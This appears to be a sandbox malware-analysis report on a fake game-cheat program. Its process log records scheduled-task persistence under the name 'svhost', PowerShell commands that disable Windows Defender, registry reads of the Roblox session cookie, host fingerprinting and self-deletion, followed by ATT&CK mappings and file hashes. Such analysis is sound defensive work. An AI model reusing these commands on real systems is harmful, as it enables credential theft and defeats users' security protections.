C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:1092
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:1476
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:2948
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:3216
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:6140
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:6136
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:1856
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5428
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5352
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:1448
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4648
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5304
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5260
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:4116
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5452
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:4416
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:3664
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:3996
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5276
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:2944
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:3196
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:3608
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:1596
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:4876
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4688
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:512
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:788
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:4672
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:904
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:5432
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:1384
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5972
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:1232
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:1372
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:1480
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5956
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5164
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:764
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5444
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:3900
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:1092
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5368
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4892
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:6136
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4576
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:5428
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4000
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:2064
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5988
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:3000
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:3400
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:5064
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5220
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5276
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:3608
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:3844
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4308
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:4844
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:3612
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:3232
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:2968
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:208
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:1252
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:5892
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5972
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:4208
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4440
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:2160
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:612
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5360
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:6076
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:4984
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4860
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5948
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:2052
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5444
-
-
-
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5632
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5824
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
- Loads dropped DLL
PID:4012
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5860
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3432
-
C:\Users\Admin\Downloads\PowerCheats.exe"C:\Users\Admin\Downloads\PowerCheats.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:1968 -
C:\Users\Admin\Downloads\PowerCheat\PowerCheatEmuHider.exe"C:\Users\Admin\Downloads\PowerCheat\PowerCheatEmuHider.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:4248 -
C:\Users\Admin\AppData\Local\Temp\PowerCheatEmuHider.exe"C:\Users\Admin\AppData\Local\Temp\PowerCheatEmuHider.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1316 -
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit4⤵PID:2488
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST5⤵
- Creates scheduled task(s)
PID:1976
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit4⤵PID:4280
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST5⤵
- Creates scheduled task(s)
PID:5024
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit4⤵PID:5840
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST5⤵
- Creates scheduled task(s)
PID:5308
-
-
-
-
-
C:\Users\Admin\Downloads\PowerCheat\HiderLdPlayer.exe"C:\Users\Admin\Downloads\PowerCheat\HiderLdPlayer.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:6020 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:776
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\Downloads\PowerCheat\HiderLdPlayer.exe"2⤵
- Views/modifies file attributes
PID:5968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\PowerCheat\HiderLdPlayer.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1872
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3896
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Loads dropped DLL
PID:4416
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Loads dropped DLL
PID:5132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵PID:5740
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1620
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\PowerCheat\HiderLdPlayer.exe" && pause2⤵PID:5040
-
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:5812
-
-
-
C:\Windows\conshost.exeC:\Windows\conshost.exe1⤵
- Executes dropped EXE
PID:5612
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jhlyxaos.default-release\activity-stream.discovery_stream.json.tmp
Filesize23KB
MD5c327f1a4feda6bcb47b197c770c36a5c
SHA155425c9fcf2c1da0883a174528293f89e0337697
SHA256b655ac565268ec034c3425096e7640d494a3b5c8016a1e13844415bf952c0ee3
SHA512a6b3ff441521e52dd6bc7095bff4dd8e4566282ae7e7b516fb1c404eeb8ca36d80868e5d27117894f615f654da4af1edc6a1cd9494cb7a8bf07485df4ae50e7d
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jhlyxaos.default-release\activity-stream.discovery_stream.json.tmp
Filesize23KB
MD584768aac05893eaeabe33bfceae78122
SHA1bd341cc64823b801c863ee734ea5e182668af4b8
SHA2564a14231a5700d33b97a676859045da38f55c4647dfd7e1cd6e8124c1b283b94e
SHA5122622c65f3e1e04332232624c6b5ff32a564686d3b6a76ee8c53799b9d65522ad5fe61a4838a0bfc5ae23f7d49f3b2d4776e9dbb8881ec899b1946c949135c479
-
Filesize
8KB
MD5ce7d6a44c45c0e9081c170156fb3ab78
SHA1a58226618f8fc6df2469e1432d0cd6e167955156
SHA256994ca6f297f13db7b1aac806059f1de968955fca89ae584611b2461d92f5a85f
SHA5124952065a0561fec32dc83d46140e8d7980bb4a865f8aaadb34a8c585b0eaf152ac8f7a85573ea1833c0f9dd19491a48283ba9cc212324af9a9599464fd909745
-
Filesize
7KB
MD591d186f4d7b8c5ccec5f4aa45a3b1344
SHA1429e7ff80ae1926dcd1a90ad44aa79b105c1602a
SHA256523fae7389a27b8ad842089190d87268c3f382656be2e526e4e7e1593e7fc957
SHA512a78405ab93e78b0b6933d688ad0b7f19ec8f82a8ec781e9d3cfd3c30c476d596cbc2b244571c99b8618dfb988c51896cbf8f1f544af84bf9ff7cd2445c47d5b7
-
Filesize
8KB
MD589c235ec6f64feaae2dafc4f7f515cdd
SHA150d4a9967ba7e8c4e2872404ff1acdf5543a0f00
SHA256586873609c009c8de787c4cf9a9799f6d4f36675eaa52474a8eb5b17ae6bd45d
SHA512661666a2028aeb07b44ab6cb572e177f1281bf65dced0ce9d65d6960691c5dca3265ac203834c3b960597992e6f311e03357fe275732c07a80b04614676a5c05
-
Filesize
8KB
MD50a95a22461bbee1954c5e589f46acf31
SHA12ec84c71b1911fcf0629ee06fdf508aab5013470
SHA256d14f695514dcbe692aa2ee707f8ef54f4e97c9aa0d5068701859088c2cf3208d
SHA5126c88deceacd4c0493fb891d7321a859b5ee45073ca314018d3d5e7e547a4bd3f9cfce847f025535367f1c4c81eeb5d54dd3cabd37f525709543ac5988b8862b4
-
Filesize
23KB
MD501ce2cf750b75a7991846f70121cf894
SHA1b10f428a2c6f28dab4b8000aeee3aac758e757c1
SHA256725c4a43b0c4f49661193cbb8be4274da955c31145165c0474e02c41a1c630ef
SHA512ac66199030794549c2bf67abf3b7391019abaffde88486e7094cab8b3b8149df0858917616b2c44055b58f56aba2aaaa020a1cdf5918f651090573b69284bbc4
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jhlyxaos.default-release\cache2\entries\13EFA2A0AEBD2083A85C899358878A2DC2AD7C54
Filesize41KB
MD5dfe8803e091343317363e64e4903cb7b
SHA1fea476d6d8986169f9cd7295780f86e9bac6672a
SHA2564e85ad98c9ffdd65f85b1ecee2cabc36ca313e0676b159c3b2423531f1076afa
SHA512b02ab4d1bf34b6ec606e030d4af79f1acb31b2e1fd3bec1f0fc2b7a49296ad4990b52f894e9d709336d34828c3ca16ef331a6e128dacca6a65124f00905f8b17
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jhlyxaos.default-release\cache2\entries\383A97A57B113BD106DE6984E6DBA5F537327263
Filesize13KB
MD5c68b493f41a50c45b5c5f1104c5c03d4
SHA1a84505b92fd2106c1ab1a6a7e0e68be7bf963566
SHA256523fd695b954c61fbb0266a0034288535f7e79a2e41bf57d4a0d89a70aa01c98
SHA5123a135ff7e8da00c4136807b39c4057fde741b5fce520c136b60bfd6f144a27648b9ec5e46d7f44792322ae2fdad19cc19475515d39bc12c0d76de0095f163f0b
-
Filesize
517KB
MD5ae357200b048e8623e2c69ddec553db5
SHA18ca678c49a82f93304a6bd2de2b88abbc966cfa5
SHA256f7e68891530b6a1a97022a9787dfdb363f1a531fc6d0e7f45355a836c2805d09
SHA5124a1960f43b502065c9a955d2bbe8973d91245abf297b33c7244b60561eb4d71519a8996148e41fdd072a7127199b7b8791cb0206854b6573eb3e4ec48bc5f0b6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
